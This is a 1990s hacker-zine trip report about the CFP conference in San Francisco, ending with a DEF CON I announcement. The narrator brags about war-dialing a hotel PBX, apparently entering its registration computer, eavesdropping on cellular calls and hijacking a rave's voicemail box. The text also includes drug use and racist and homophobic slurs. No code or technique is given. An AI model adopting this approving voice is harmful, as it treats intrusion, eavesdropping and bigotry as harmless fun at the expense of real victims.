After griping for nearly 30 minutes at the fact that I had neglected to likewise bring 500 pounds of 5ess manuals for him, Fitzgerald took off. Sleep. 2. Mindvodxka After several needed hours rest, I took off downstairs to scope out the spread. I ran into Bruce Sterling who relayed some of the morning's events, the highlight of which was Don Delaney's "Finger Hackers" the inner city folks who sequentially dial, by hand, every possible combination of pbx code to then sell on street corners. Out of the corner of my eye I spotted two young turks dressed like mafioso: RBOC & Voxman. I wandered over and complimented them on their wardrobe and told them to buy me drinks. Beer. Beer. More beer. Screwdrivers. Screwdrivers. Last call. Last screwdriver. RBOC and I decided that it was our calling to get more drinks. We took off to find a bar. Upon exiting the hotel we realized that we were in the middle of fucking nowhere. We walked up and down the street, rapidly getting nowhere. In our quest for booze, we managed to terrorize a small oriental woman at a neighboring hotel who, after 10 minutes of our screaming and pounding, finally opened up the door to her office wide enough to tell us there were no bars within a 15 mile radius. We went back to the hotel very distraught. We went back to RBOC's room where Voxman was sampling a non-tobacco smoke. We bitched about the lack of watering holes in the vicinity, but he was rather unsympathetic. After he finished his smoke and left the room, we decided to order a bottle of vodka through room service and charge it to Voxman since it was roughly 50 dollars. RBOC called up room service and started to barter with the clerk about the bottle. "Look, tell you what," he said, "I've got twenty bucks. You meet me out back with two bottles. I give you the twenty and you keep one of the bottles for yourself." "Look man, I know you have about a thousand cases of liquor down there, right? Who's going to miss two bottles?
Don't you want to make a few extra bucks? I mean, twenty dollars, that's got to be about what you make in a day, right? I mean, you aren't exactly going to own this hotel any time soon, am I right? So, I'll be down in a few minutes to meet you with the vodka. What do you mean? Look man, I'm just trying to help out another human being. I know how it is, I'm not made out of money either, you know? Listen, I'm from NYC...if someone offers me twenty dollars for nothing, I take it, you know? So, do we have a deal?" This went on for nearly an hour. Finally RBOC told the guy to just bring up the damn bottle. When it arrived, the food services manager, acting as courier, demanded proof of age, and then refused to credit it to the room. This sparked a new battle, as we then had to track down Voxman to sign for our booze. After that was settled, a new crisis arose: We had no mixer. The soda machine proved our saviour. Orange Slice for only a dollar a can. We decided to mix drinks half and half. Gathering our fluids, we adjourned to the lobby to join Voxman and a few conventioneers. The vodka went over well with the crew, and many a glass was quaffed over inane conversation about something or other. Soon the vodka informed me it was bed time. 3. It Begins. I woke late, feeling like a used condom. I noticed more bags in the room and deduced that X-con had made it to the hotel. After dressing, I staggered down to the convention area for a panel. "Censorship and Free Speech on the Networks" was the first one I got to see. The main focus of the panel seemed to be complaints of alt.sex newsgroups and dirty gifs. As these two are among my favorite things about the net, I took a quick disliking of the forum. Nothing was resolved and nothing was stated. There was a small break during which I found X-con. We saw a few feds. It was neat. The head of the FBI's computer crime division called me by name. That was not terribly neat. 
The next session was called "Portrait of the Artist on the Net." X-con and I didn't get it. We felt like it was "portrait of the artist on drugs on the net." Weird videos, odd projects, and stream of consciousness rants. Wasn't this a privacy conference? We were confused. The session gave way to a reception. This would have been uneventful had it not been for two things: 1) an open bar 2) the arrival of the Unknown Hacker. U.H. was probably the most mysterious and heralded hacker on the net. The fact that he showed up in public was monumental. The reception gave way to dinner, which was uneventful. 4. Let the Beatings Begin A few days before the con, Mr. Blast had scoured the net looking for dens of iniquity at my behest. In alt.sex.bondage he had run across a message referring to "Bondage A Go-Go." This was a weekly event at a club in the industrial district called "The Bridge." The description on the net described it as a dance club where people liked to dress up in leather and spikes, and women handcuffed to the bar from 9-11 drank free! This was my kind of place. On that Wednesday night, I could think of nothing but going out and getting to Bondage A Go-Go. I pestered X-con, Mr. Blast and U.H. into going. We tried to get Fender to go too, but he totally lamed out. (This would be remembered as the biggest mistake of his life.) We eventually found ourselves driving around a very seedy part of San Francisco. On one exceedingly dark avenue we noticed a row of Harleys and their burly owners hanging outside a major dive. We had found our destination. Cover was five bucks. Once inside we were assaulted by pounding industrial and women in leather. RAD! Beer was a buck fifty. Grabbing a Coors and sparking a Camel, I wandered out to the main dance floor where some kind of event was taking place. Upon a raised stage several girlies were undulating in their dominatrix get-ups, slowly removing them piece by piece. A smile began to form. X-con and U.H.
found me and likewise denoted their approval. The strip revue continued for a few songs, with the girlies removing everything but their attitudes. The lights went up, and a new girl came out. She was followed by a friend carrying several items. The first girl began to read rather obscure poetry as the second undressed her. Once girl1 was free of restrictive undergarments girl2 donned surgical gloves and began pouring generous amounts of lubricant over her hands. As the poetry reached a frantic peak, girl2 slowly inserted her entire hand into girl1. A woman in the crowd screamed. My smile was so wide, it hurt. The fisting continued for an eternity, with girl1 moving around the stage complaining in her poetic rant about how no man could ever satisfy her. (This was of no surprise to me since she had an entire forearm up her twat.) Girl2 scampered around underneath, happily pumping away for what seemed like an hour. When the performance ended, a very tall woman in hard dominatrix gear sauntered out on the stage. From her Nazi SS cap to her stiletto heels to her riding crop, she was the top of my dreams. Two accomplices tied a seemingly unwilling bottom to the stage and she began striking her repeatedly with the crop, to the beat of something that sounded like KMFDM. The screams filled the club, and drool filled the corners of my mouth. As the song ended, the girls all came back out on stage and took a bow to deafening applause. Then the disco ball lit up, and Ministry began thundering, and people began to dance like nothing had ever happened. We were a bit stunned. We all wandered up to the second level where we were greeted by a guy and two girls going at it full on. I staggered dazed to the second story on the opposite side. There was a skinhead getting a huge tattoo and a girl getting a smaller one. I was not brave enough to risk the needle in San Francisco, so I wandered back downstairs. That's where I fell in love. 
She was about 5'2", clad in a leather teddy, bobbed blood red hair, carrying a cat o'nine tails. Huge, uh, eyes. Alas, 'twas not to be. She was leading around a couple of boy toys on studded leashes. Although the guys seemed to be more interested in each other than her, I kept away, knowing I would get the hell beaten out of me if I intervened. As it approached 3:00 am, we decided it was time to go. We bid a fond farewell to the Bridge and took leave. We all wanted to see Golden Gate, so U.H. directed us towards downtown to the bridge. Passing down Market, we noticed a man lying in a pool of blood before a shattered plate glass window, surrounded by cops. We eventually reached the Golden Gate Bridge. We drove across to the scenic overlook. Even in the darkness it was rather cool. We took off through the hills and nearly smashed into a few deer with the car. It was almost time for the conference by then, so we decided to get back. 5. Thursday I made it downstairs for the "Medical Information and Privacy" that morning. As I was walking towards the room, I got a sudden flash of an airlines advertisement. The Pilot had arrived. I was shocked. Here was this guy who used to be one of the evil legionnaires, and he looked like an actor from a delta commercial...blue suit, aviator sunglasses, nappy hat with the little wings. Appalling. I drug him into the meeting hall where we sat and made MST3K-like commentary during the panel. I began to get mad that no one had even mentioned the lack of legislation regarding medical records privacy, nor the human genome project. I was formulating my rude commentary for the question period when the last speaker thankfully brought up all these points, and chastised everyone else for not having done so previously. Good job. I snaked The Pilot a lunch pass, and we grabbed a bite. It was pretty good. I noticed that it was paid for by Equifax or Mead Data Central or some other data-gathering puppet agency of The Man. 
No doubt a pathetic ploy to sway our feelings. I ate it anyway.

After lunch, John Perry Barlow got up to bs a bit. The thing that struck me about Barlow was his rant about the legalization of drugs. Yet another stray from computers & privacy. It must be nice to be rich enough to stand in front of the FBI and say that you like to take acid and think it ought to be legal. I debated whether or not to ask him if he knew where to score any in San Francisco, but decided on silence, since I'm not rich.

I lost all concept of time and space after Barlow's talk, and have no idea what happened between that time and that evening.

6. Birds of a Feather BOF together

That night we went to the Hacker BOF, sponsored by John McMullen. Lots of oldies sitting around being superior since it wasn't illegal when they swiped cpu access, and lots of newbies sitting around feeling superior since they had access to far better things than the oldies ever dreamed of.

A certain New York State Policeman had been given the remainder of the bottle of vodka from the previous night. It was gone in record time. Later he was heard remarking about how hackers should get the death penalty. When Emmanuel Goldstein demonstrated his Demon Dialer from the Netherlands, he sat in the corner slamming his fist into his hand muttering, "wait till we get home, you'll get yours."

I went outside and hid. Also hiding outside was Phiber. We exchanged a few glares. He and I had been exchanging glares since our respective arrivals. But neither of us said anything directly to the other. I had heard from several people that Phiber had remarked, "on the third day, I'm gonna get that guy. Just you wait." I was waiting.

I decided that Thursday should be the night we would all go to a strip club. After telling everyone within a 15 mile radius about Bondage A Go-Go, it was rather easy to work up an interest in this adventure. Me, X-con, Mr. Blast, U.H. and Fender would be the valiant warriors.
Before making preparations to leave, X-con and Fitzgerald decided to check out the hotel's PBX. Setting up Tone-Loc, X-con's notebook set out banging away at the available block of internals. We decided that the hotel had a 75, and yes, it would be ours, oh yes, it would be ours. It was a Herculean task to gather the crew. Despite their desire to go, everyone farted around and rounding them up was akin to a cattle drive. Fender cried about having to attend this BOF and that BOF and Mr. Blast cried about being tired, Fitzgerald cried about not being old enough to go, and I just cried. Eventually we gathered our crew and launched. 8. Market Street Madness We initially went out to locate the Mitchell Brothers club. I had heard that it was quite rad. Totally nude. Lap dancing. Total degradation and objectification. Wowzers. U.H. said he knew where it was. He was mistaken. The address in the phone book was wrong. It was nowhere to be found. We ended back up on Market surrounded by junkies and would-be muggers. Thankfully, there were no fresh corpses. I saw a marquee with the banner Traci Topps. Forcing Mr. Blast to pull over, we made a beeline to the entrance. Cover was ten dollars, and we had missed Traci's last performance. We paid it anyway, since we had bothered to pull over. Big mistake. Now, when I think of strip clubs, I think of places like Houston's Men's Club, or Atlanta's Gold Club, or Dallas' Fantasy Ranch. Very nice. Hot women. Good music. Booze. Tables. We entered a room that used to be a theater. Sloping aisles along theater seats side by side. Up on the stage, was a tired, unattractive, heavy set brunette slumping along to some cheesy pop number. I was instantly disgusted. I felt compelled to tell X-con that strip clubs were not like this normally, since he had never been to one, and it was my bright idea to be here. We noticed some old perv at the far end of our row in a trench. It was like out of a bad movie. 
He was not at all shy about his self-satisfaction and in fact seemed quite proud of it. He kept trying to get the girls to bend down so he could fondle them. Gross beyond belief. We debated whether or not to point and laugh at him, but decided he might have something more deadly concealed under the trench and tried to ignore it. Some more furniture passed across the stage. One sauntered over to me and asked if I'd like any company. I asked her what the hell this place was all about. She said that this was the way most places were downtown. I told her that I expected tables, beer, and a happy upbeat tempo. She shrugged and said she didn't know of anything really like that. On the stage a really cute girl popped up. A shroom on this turd of a club. Fender and I both decided she was ours. Fender said there was no way that I would get the only good looking girl in the place. I said he needed to get real, that it would be no contest. As soon as she left the stage, Fender disappeared. Later he returned smirking. Moments afterward, the girl appeared and plopped down in his lap. (We found out later he paid her.) He continued his dialogue for about 20 minutes discussing philosophy or something equally stupid to talk to a nude dancer about, and then we got up to leave. She gave him her phone number. (It was the number to the Special Olympics.) We left, and I apologized to everyone. We took off to Lombard street and fantasized about letting the rental car loose to plummet down the hill, destroying everything in its path. Next time we decided we would. Then it was decided that it would be a good idea to look for some food. We ended up somewhere where there was some kind of dance club. Everything was closed and there was no food to be seen. Walking down a few side streets looking for food, U.H. decided to tell Fender that he had broken into his machine. Fender turned about 20 shades of green. 
We then went back to the Golden Gate Bridge since it never closed and stared out at the bay. Fender began to talk incoherently so it became urgent that we get back to the hotel and put him to bed to dream happy dreams of his stripper Edie. Back at the hotel X-con and I could not sleep. The notebook had found a number of carriers. One was for a System V unix. We decided that this was the hotel's registration computer. We knew most used some kind of package like encore, so we...well. :) We also found several odd systems, probably some kind of elevator/ac/power controllers or whatnot. At 5am or so, X-con and I took off to explore the hotel. Down in the lobby we found RBOC busily typing away to a TTD operator on the AT&T payphone 2000. He was engrossed in conversation, so we left him to his typing. X-con started to look around the Hertz counter for anything exciting and set off the alarm. Within seconds security arrived to find me perched on the shoeshine stand and X-con rapping on the payphone to another hotel. We told him we hadn't seen anyone go behind the counter. He didn't believe us but left anyway. As we burst into fits of laughter, Mitch Kapor, in shorts and t-shirt came cruising by and exited through a glass door. We weren't quite sure if he were real so we snuck through the door after him. The door led to the gym. Mitch was busily pedaling away on an exercycle. X-con and I decided to explore the hotel since we never even knew there was a gym, and who could tell what other wild and wacky places remained unseen. We took off to find the roof, since that was the most obvious place to go that we should not be. Finding the stairwell with roof access, we charged up to the top landing. The roof was unlocked, but right before opening the hatch, we noticed that there was a small magnetic contact connected to a lead. Not feeling up to disabling alarm systems so late in the evening (or early in the morning), we took off. On another level, we found the offices. 
Simplex locks. Amazing. Evil grins began to form, but we wimped out, besides it was damn near convention time. 9. Coffee, Coffee and More Coffee Outside the convention room the caterers had set up the coffee urns. X-con and I dove into the java like Mexican cliff jumpers. It got to be really really stupid. We were slamming coffee like there was no tomorrow. Fuck tomorrow, we slammed it like there was no today. I put about eight packets of sugar in each of my cups. Ahh, nothing like a steamin' cup o' joe. By the time we were done we had each drank nearly 20 cups. The world was alive with an electric hum. We were ready to take on the entire convention. Yep. After another cup. The first panel of the day was "Gender Issues in Computing and Telecommunications." As the talk began, the pig in me grew restless. "What's all this crap?" it said. "Bunch of feminazis bitching about gifs. They should all go to the bridge next Wednesday, that will give them a new perspective. Where's Shit Kickin' Jim when you need him?" Then I got more idealistic in my thinking. "Ok, fine, if women demand equal treatment on the net, then what about equal treatment for homosexuals? What about equal treatment for hermaphrodites? What about equal treatment for one-legged retired American Indian Proctologists on the net? And let us not forget the plight of the Hairless. Geez. What a load of hooey. I wanted to jump up and yell, "THE NET IS NOT REAL! WORRY ABOUT THE REAL WORLD AND THE NET WILL CHANGE! YOU CANNOT CHANGE REALITY BY CHANGING THE NET!" If only I'd had another cup of coffee, I might have done it. The women got nothing done. After the panel X-con and I took off to the room, after getting a few cups of coffee for the elevator ride. We sat in the hotel room and made rude noises until Mr. Blast and Fitzgerald got up. We all fought for the shower and by noon we were ready to venture outward for lunch. 10. Cliffie! The lunch that day had a few pleasant surprises. 
The first came in the form of a waitress with HUGE, uh, eyes. Having something of a fetish for big, ahem, eyes, I practiced my patented Manson-like gaze for her benefit.

The second surprise came when the CFP staffers cornered a couple of people at our table. KCrow and Xaen had photocopied lunch tickets and forged badges to hang out at the conference. Finally, on the last day, the staffers suddenly decided that these two might not be paying attendees. Whether it was the names on their badges that did not check out, or the fact that Xaen had been walking around in a red and white dress-like robe the entire day. They let them stay, but told them next time to either make better forgeries or send in their scholarship applications like everyone else.

As lunch drew to a close, the crowd grew restless. A cry rang out, "CLIFFIE!" The crowd took up the cry, and executives began throwing conference papers in the air, stomping their feet and holding up their lit cigarette lighters. "We want Cliffie, we want Cliffie!" The house lights dimmed and a silhouette of frazzled hair appeared at the head of the room.

Well, maybe it wasn't quite like that.

Cliff Stoll took the stand and began a stream of consciousness rant that would make someone with a bipolar disorder look lucid. Contorting himself and leaping on tables, Cliff definitely got my attention. It was kind of like watching Emo Philips on crank while tripping. I dug it. If you have the opportunity to catch Cliff on his next tour, make sure to do so. Lorne Michaels could do worse than make some kind of sitcom around this guy. It was probably the most amazing thing I had seen at the official conference.

11. A Little Bit O' History

Fitzgerald heard that there was a Pac Bell museum downtown. This news evoked a Pavlovian response almost as pronounced as me at The Bridge. Me and The Pilot wanted to check it out too so we decided to go. It was like the Warner Bros.
cartoon of the big dog and the little dog "huh Spike, we gonna get us a cat, aren't we Spike, yep, we are gonna get that cat, boy, aren't we Spike, yep, yep, boy I can't wait, boy is that darn cat gonna be sorry, isn't he Spike, huh, Spike, huh?" Fitzgerald was psyched.

Driving through downtown San Francisco was kind of like some kind of deranged Nintendo game. The streets were obviously laid out by farm animals. Traffic was disgusting. Of course, 3:30 on Friday afternoon is official road construction time in downtown San Francisco. That was not in my "Welcome To SF" guide, so I penciled it in.

About 4:00 we found an open lot, amazingly enough across from the Pac Bell building. We paid roughly 37 thousand dollars for the spot and took off to the museum. Fitzgerald was in heaven. He had called the museum from the hotel before we left and told them we were on our way.

Upon walking in the building we were stopped by a guard. He asked us what we wanted. Fitzgerald said, "We're here for to see the museum!" The guard gave us the once over and said, "Museum's closed." Fitzgerald almost fainted. Sure enough, the museum guy had bailed early. Probably immediately after receiving our phone call. Typical telco nazi antics.

We took to the streets. (The streets of San Francisco...haha) Wandering up and down the hills checking people out proved quite fun. We checked out Chinatown where we all decided that the little Oriental schoolgirls in their uniforms were quite amazing. We tried to spot the opium dens, and pointed out suspect organized crime figures.

Suddenly, we realized we were lost, and if we didn't get back to the lot we would lose our car. (Thirty-seven thousand dollars only buys you a spot for a few hours.) We managed to find our car minutes before the tow trucks rolled in and spent a few more hours looking for buildings with good dumpsters for that night's planned trashing spree. We found a few spots and took off towards the hotel and dinner.

12. Zen & The Art of Trashing

That night everyone decided to move into our room. Somehow Fitzgerald stole a bed and wheeled it into our room to allow for more sleep space. So, it was X-con, Fitzgerald, me, Fender and Mr. Blast all smashed into the little room.

As we were sitting in the room discussing what to do that evening, the door burst open and a large man in basketball sweats walked in. After he saw us in the room he turned around and quickly exited. Fitzgerald ran out in the hall after him and discovered that the whole hall was full of basketball players. We called down to the front desk to complain that our room had been given out. The desk apologized and told us that the mistake had been noticed and they would correct the problem with the basketball team. This did not exactly sit well with me, as I envisioned shitloads of jocks rooting through our stuff, taking my camera and various and sundry electronics gear.

Temporarily forgetting about the impending robberies, we took off to do a little recon of our own. The five of us and The Pilot piled into two cars and took off towards downtown looking for garbage. We found several Pac Bell offices but the only one with any type of dumpster had nothing to offer save old yellow pages and pizza boxes. We were totally bummed.

We decided to wander around aimlessly to see what we could stumble across. After making about a dozen turns and walking a mile or two we came across a huge black beast of a building. It looked like the Borg Cube. It was vast and foreboding. It was an AT&T building.

Fitzgerald took off towards the door to ask for a tour. It was only 11:00 in the evening, so we were certain that we would be given a hearty welcoming and guided journey through the bowels of the cube. Yeah, right. Alas, we were not to be assimilated. The guard told us to get lost. We decided to see if the Borg used dumpsters.
Around the back end of the building by the loading docks we saw several stair landings starting about three floors up. We debated scaling the building, but noticed about 500 security cameras. This place was possibly the most secure telco installation we had ever seen. We decided that this place must be the point of presence for the West Coast since it was just so damn impenetrable. As we turned to leave I noticed a small piece of white cord on the ground. As I picked it up, we noticed it led from a small construction shack behind the POP. It ran all the way from the shack to a heavy steel door in the side of the cube where it snaked its way under the door into the building and probably into the frame. We all had a great laugh at the exposed line, and wished we would have had a test-set to make a few choice overseas calls. We wandered back to the cars and ended up driving around downtown some more for a few hours before ending up back at the hotel. 13. Mr. Blast Can't Drive. We all regrouped the next morning to go shopping downtown. Fender was kind enough to dish out vast quantities of chocolate-covered espresso beans and we all got completely wired. X-con and I decided that we should have had a bag of these the previous morning. We drove straight down to Chinatown and began looking for a place to park. Mr. Blast, Fender, X-con were in one car, me, Fitzgerald and The Pilot in another. Mr. Blast, for being from a huge city, had absolutely no concept of driving in traffic in a downtown setting. He missed lots, made weird turns, ran lights and generally seemed like he was trying to lose us. He achieved his desired goal. We cursed his name for fifteen minutes and then gave up our search. Fitzgerald had swiped Fender's scanner and was busily entertaining himself listening to cellular phone calls. He had the window rolled down in the back seat and took great joy in holding up the scanner so people walking down the street could join in on the voyeuristic fun. 
Suddenly Fitzgerald shouted, "HOLY SHIT! I can't believe it!" The Pilot and I nearly had matching strokes, "WHAT?" I said. "It's ENCRYPTED! I can't believe it man, encrypted speech on the phone!" I began to laugh, and The Pilot soon joined in. It was Mandarin. "Where the hell are we, Fitz?" I asked him. "San Francisco," he replied. "No," I said, "Specifically, where in San Francisco?" Fitzgerald thought for a minute and said, "Uh, Chinatown?" Suddenly, his eyes lit up, "OHHHHHHH. Hehe.. it's not encrypted is it?" We laughed at him for about ten minutes.

We came to a stop light where a very confused Chinese lady was looking at us. Fitzgerald held up the scanner and I yelled, "Herro!" We went hysterical as we drove off, leaving the woman even more bewildered.

We found a place to park and decided to explore on our own. The plethora of little Chinese hotties blew my mind. We staggered around Chinatown trying to get bargains on electronics gear. It struck us all as odd that every electronics store in the downtown area was owned and operated by Iranians. Needless to say, no bargains were found.

We had lunch at a restaurant called Red Dragon. The majority of the lunch was spent talking telco. Watching Fitz and The Pilot get totally wrapped up in the talk, both trying to tell the best story about the neatest hack proved incredibly interesting.

We took off into the crowds to try to find cheap watches, since The Pilot's watch was ready to retire. He soon made a totally sweet deal on a watch from an oriental merchant and we took off for the car.

On the way we noticed a small shop in a back alley with throwing stars in the window. Inside was ninja heaven. They had daggers, cloaks, stars, nunchaku, swords, masks and tons and tons of violence inducing paraphernalia. I saw a telescoping steel whip behind a case. I knew I must possess this item, and when I found out that it was only $22.00 the money was already in my hands. Fitz also got a whip and five stars.
We were now armed...Phiber beware. We took off down to the port to look out at the bay. While we were there we watched a bunch of skaters doing totally insane street style in a small cement fountain area. One kid waxed the street with his face and we all had a serious laugh, much to the chagrin of the injured and his posse. As soon as they scraped up the hapless skatepunk off the ground, they resumed their thrashing, avoiding the wet spot. We decided that these kids were totally insane. We took off back to the hotel to meet up with the idiots. Once we arrived we found that we were locked out of our room. In fact, not only had they cut off our keys, but they had checked us out. We got a security guard to let us in the room. Shortly thereafter X-con et.al. returned loaded with gear they had picked up on their trip. They exclaimed that they rushed back to the hotel at top speed, since when they tried to call the room, the hotel had said that our room was not in use. I got furious and went downstairs to yell. Eventually, we got our phone service back and the manager went upstairs to give us a live body to verbally abuse, which we took full advantage of. He shucked and jived his way through an apology but we did not get a free night as we had hoped for. 14. Castro-Bound X-Con wanted shoes. We all sorted out the card key mess and piled back in The Pilot's car and headed out to find NaNa's. As we drove towards the store we noticed something change about the city. The fog lifted. The colors got more pastel. The men walking down the street seemed to have more spring in their step. We had entered the Castro. I really wanted to hit a record store in the Castro because homos always seem to have cool dance music. I convinced everyone that we should pull over and risk a quick walk down the main drag. The stroll was a complete farce. Our crew seemed to be extremely apprehensive. 
To make them more edgy I took great glee in talking real nelly and batting my eyes at anything that moved. No one was amused. In fact, Fitzgerald and the Pilot looked like they wanted to cry and run back to the car and hide. None of the record stores had anything good. There were lots of old Judy Garland and Ethyl Merman but nothing more modern than the Village People. (And I was expecting techno. But noooooo...) On our way back to the car we passed by a leather goods store. Not exactly Tandycraft, if you get my drift. X-con was the only one brave enough to go in. He came out looking drained of all color holding a catalog. "There were these three guys in there," he stammered. "One of them was being fitted for a cock sheath. The two other guys kept showing him different ones, but he said they were too big." We all shuddered and hastened our return to the car. We drove a few miles more down the street and ended up at the NaNa's shop. The store was your typical alternative grunge-wear shop. Stompin' boots, nifty caps, shirts by Blunt. X-con got his shoes. We all got nifty caps. Leaving for the hotel, I grabbed a handful of flyers from the front window. Most were rave flyers for the next weekend. One however was announcing a bondage party for 'women only' two days later. I felt a tear begin to form as I reminisced about the Bridge. 15. Hating It In The Height. We regrouped back at the hotel and took off again for the Height to go check out Rough Trade records and see what could be seen. And X-con and I needed a few tabs. (YEEE!) We needed these rather badly since Mr. Blast had found out about a rave that evening from the SF-RAVES mailing list. There was no way X-con and I could sit through a rave sober, and dancing was WAY out of the question. Rough Trade was closed. We decided to grab a quick bite to eat while waiting for information on the rave. We decided to try something really odd, since we weren't in for the typical corporate burger scene. 
A bit down the street from Rough Trade we happened upon an Ethiopian restaurant. Since this was about as obscure as any of us had ever dreamed, we decided to check it out. I personally didn't think Ethiopians ever had any food, and made a few jokes about wanting something light, so this would definitely be the place.

Ethiopian food was odd. Looking over the menu, Mr. Blast decided that he didn't want much of anything they had to offer. We decided that we should buy a lot of everything and just pick and choose. I made the comment that I would only eat chicken, and Mr. Blast didn't like the idea of eating much of anything everyone wanted to try. We ordered separately.

The food came out in a rather odd fashion. Everything was piled on top of everything else. It was all splattered on top of a weird pancake-like sponge bread. There were all manner of sauces to smother, dip, or otherwise destroy the entrees with, so we all took great bravado in our sampling of each. It was quite a fantastic spread, and I wholeheartedly urge everyone to check out this particular cuisine.

After the meal we took off to find a phone to call the raveline. On our way to the phone X-con and I stumbled across a few transients who offered us acid at a remarkable price. This was almost too good to be true. We slunk down a side street and bs'ed with the homeless couple as we decided how many to buy. We settled on 20 hits for 45 dollars. X-con and I were psyched. The rave would indeed be tolerable.

We hooked up with the crew, smiling like Cheshire cats. Mr. Blast had the directions to the rave so we took off ready to overindulge. By the time we reached the rave, we were one of what seemed like a hundred or two hanging outside of a warehouse. This might be pretty damn cool.

X-con and I began our dosing. Now, usually I love the first contact of the blotter with my tongue. It evokes a certain tangy taste, akin to touching a battery to the tip of your tongue.
It always gets the adrenaline flowing, and brings back memories of what will soon be repeated. Nothing. I looked at X-con. "Dude," he said, "I can't taste shit. I better take more." He dropped about 3 more. Still no taste. I ate a few more myself in a futile hope that some lysergine substance may have once resided in the fibers of the blotter. Nope. This was the beginning. As we waited to be let in to the warehouse, cursing the transients, the sirens begin to wail. Fucking great. Five police cars swept into the cul-de-sac that led to the warehouse. The rave would not be in this location. Everyone bailed like rats from a sinking ship, yelling that the rave would be moved to a soon to be announced location. Now X-con and I were really pissed. I whipped out my steel whip and said, "Let's go pay a quick visit to the Height and visit our friends." We piled back into the cars and set out to do some serious damage. Arriving in the Height we noticed that cops were everywhere. This was not going to be easy. X-con and I set out like men possessed. The transients were gone. We wandered up and down the street for about 30 minutes looking for our prey. Finally we saw them. They saw us. One ran like a marathon sprinter. The other stayed, but was soon flanked by a gang of eight other transients. X-con walked right up and said "You fucking ripped us off!" As we tried to get either our money back or working drugs, more and more transients gathered. It was time to write it off as a loss. We cursed and backed away from the crowd. Our group had congregated at a grocery store at the end of the street. Mr. Blast was speed dialing the raveline in a desperate attempt to find a venue to spin wildly in and blow his day-glo rave whistle. Across the street, a homeless black man screamed painfully at each and every passing car, "HELP! You gotta take me and my girlfriend to the hospital now! She's gonna DIE!" He staggered over to us and begged for a ride, we respectfully declined. 
As this was going on, the grocery store erupted with violence as a drunken frat type was ejected forcibly. He started swinging wildly at the rent-a-cop, and was greeted with the business end of a police baton. The Pilot decided this was a good time to make his exit. He waved goodbye and was gone.

RBOC, Voxman and a nameless waif arrived in the parking lot. We told them the status of the rave and they decided to wait to see if there may be any type of decadence forthcoming. About that time Mr. Blast came screaming across the lot with the directions. We no longer had room for everyone, so Voxman & the nameless waif were offered a ride from a flaming pedophile who overheard their plight. They took him up on his offer before we could stop them. We said a quick prayer for them and piled into the car.

16. Stark Raving Mad Late Into The Night

The new location was out at a marina in Berkeley on the beach. It took damn near an eternity to get there and when we arrived it was raining. X-con and I made it our mission to find acid at this location. The music could be heard for several hundred yards from the street, so we took off in a sprint towards the source.

There were roughly 40 or so people. Thirty-nine guys, one ugly girl. X-con immediately disappeared in the crowd looking for someone with a beeper...anyone. Fender disappeared. Fitz disappeared. RBOC and I sat and made rude comments.

X-con arrived back with a big smile. Our saviour was in the form of a teenage Hispanic dude. He had red blotter with elephant, and yellow blotter with some other kind of design. The yellow was "three-way." We bought several of each, and there was much rejoicing. X-con had already eaten one three-way and one regular, before I could split one in half for RBOC. The taste was overwhelming. Freshly squeezed.

The three of us perched up on a hill staring out over the undulating mass waiting for the effect. It came quickly. As it hit, Fitz wandered up and said, "Let's hack the raveline!"
This idea went over VERY WELL, so we all set out towards the car, leaving little sparky streamers behind us as we moved. From a nearby hotel lobby, Fitz and X-con busily hacked at the VMB while RBOC and I sat in the car totally wigging. About 30 minutes later they ran out screaming. It had been done and the code was now 902100. We drove back to the rave and noticed the red and blues flashing and the ravers bailing en masse. We picked up Mr. Blast and Fender and took off back to our hotel. Fender had done a bit of networking at the rave and exchanged a few business cards. We were totally appalled. Once back at the hotel X-con took even more. He said he wanted to see static. Within an hour he achieved his goal. He spent a large portion of the night walking in and out of the room muttering, "Man...you guys are totally fucking with me." We then decided to spice up the raveline. RBOC changed the outgoing message a few times and then finally decided on, "HAR HAR HAR, Y'all been boarded by the pirate! No more techno! No more homosexuals grinding away at 120 beats per minute! No more Rave! HAR HAR HAR!" We laughed like schoolgirls. Everyone passed out. Everyone but us tripsters of course. We stayed up the majority of the night telling really odd pharmaceutical war stories. At about 6 am RBOC decided that he was hungry and called for room service. He ordered linguini. The room service clerk told him that the kitchen was not ready for dinner, and would only be serving breakfast. RBOC replied, "Look, do you have noodles? Yes? Do you have water? Well, what's the fucking problem. What exactly do you need to boil water? Turn on the stove, and I'll be down in a few minutes to make it myself." With this logic, the room service clerk replied his linguini would be up in about half an hour. We then decided to get escorts, or at least order up a few, and listen to them on their cell phones calling their pimps. 
(Fender had listened to about five different such conversations a few nights prior.) RBOC ordered up a couple of buxom blondes to go and we waited for their return phone call to barter on the price. The call never came in. The hotel had turned off our phone for incoming calls. This sparked even more fun, as RBOC called up the front desk to complain, "Look ma'am, my hookers can't fucking call into my room! Turn my phone back on NOW! I've had a rough night up for 24 hours on drugs, and I need a woman." The operator was not amused. The sun rose. We all remarked about the typical morning after layer of filth that seems to congeal after a good fry. The static was no longer visible to X-con and he became almost lucid again, interjecting bits of wisdom like "Uh" and "Yeah" into the conversation. His flight was in two hours. The linguini arrived and everyone had a small taste as the smell of the white sauce permeated the room. As we smacked away, the inexperienced of the crowd arose to greet a new morning. RBOC suddenly realized that NYC was probably snowed under, so he took off to find a phone to check on the status of his flight home. X-con gathered his bags and mumbled "Later," and disappeared. I fell on the bed and disappeared into darkness. 17. Laterz The alarm clock blared out a sickening beep, to which it was rewarded with a small flight across the hotel room. I gathered up my gear and made a beeline towards the elevator. Still confused, I wandered down to the lobby where I was greeted by Fitzgerald and Fender. I bid them both a fond farewell and boarded the airport shuttle. This was one hell of a good time. I wonder if CFP4 in Chicago will be as good? One can only hope. See you there. 
***************************************************************************

D E F  C O N  I  C O N V E N T I O N
D E F  C O N  I  C O N V E N T I O N
DEF CON I CONVENTION
D E F  C O N  I  C O N V E N T I O N

>> READ AND DISTRIBUTE AND READ AND DISTRIBUTE AND READ AND DISTRIBUTE <<

Finalized Announcement: 5/08/1993

We are proud to announce the 1st annual Def Con.

If you are at all familiar with any of the previous Cons, then you will have a good idea of what DEF CON I will be like. If you don't have any experience with Cons, they are an event on the order of a pilgrimage to Mecca for the underground. They are a mind-blowing orgy of information exchange, viewpoints, speeches, education, enlightenment... And most of all sheer, unchecked PARTYING. It is an event that you must experience at least once in your lifetime.

The partying aside, it is a wonderful opportunity to meet some of the celebrities of the underground computer scene. And those that shape its destiny - the lawyers, libertarians, and most of all the other

There will be plenty of open-ended discussion on security, telephones and other topics. As well as what TIME magazine calls the "Cyberpunk Movement".

Las Vegas is, as you might have guessed, a great choice for the Con. Gambling, loads of hotels and facilities, cheap air fare and room rates. It's also on the West Coast, making it more available to a different crowd than the former Cons have been.

